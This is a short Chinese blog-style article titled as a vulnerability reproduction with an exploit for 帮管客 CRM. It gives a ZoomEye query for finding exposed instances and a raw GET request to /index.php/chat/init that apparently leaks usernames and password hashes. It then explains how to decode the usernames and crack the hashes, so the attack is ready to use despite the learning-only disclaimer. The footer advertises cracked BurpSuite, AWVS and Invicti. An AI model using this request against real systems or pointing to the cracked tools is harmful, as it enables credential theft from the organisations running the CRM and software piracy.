查看原文
其他

帮管客 存在用户信息泄露-漏洞复现-附EXP

ChinaRan404 知攻善防实验室 2024-02-22

注本公众号,长期推送技术文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

前言

帮管客是一款基于移动办公、客户管理、即时IM等一体化智能管理的企业软件,支持多种部署方式,提供全方位的销售跟进、智能化服务管理、高效的沟通协同和图表化数据分析等功能。

帮管客系统存在用户名密码信息泄露

资产

ZoomEye语法:app:"帮管客CRM"


漏洞复现

数据包

GET /index.php/chat/init HTTP/1.1Host: IP:PORTUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

用户名Unicode解码

密码需要去cmd5的网站解密一下


文末

后台回复“交流群”获取技术交流群链接


往期精彩

BurpSuite v2024最新版本破解!!

AWVS 2024最新版破解教程

人手必备的 逆向分析专用虚拟机!

还在用原版SQLmap?太low了!

漏扫神器Invicti V2024专业破解版

Linux搭建幻兽帕鲁服务器以及安全注意

fofa、ZoomEye、鹰图,这么多引擎语法不好解决?

继续滑动看下一个

帮管客 存在用户信息泄露-漏洞复现-附EXP

向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存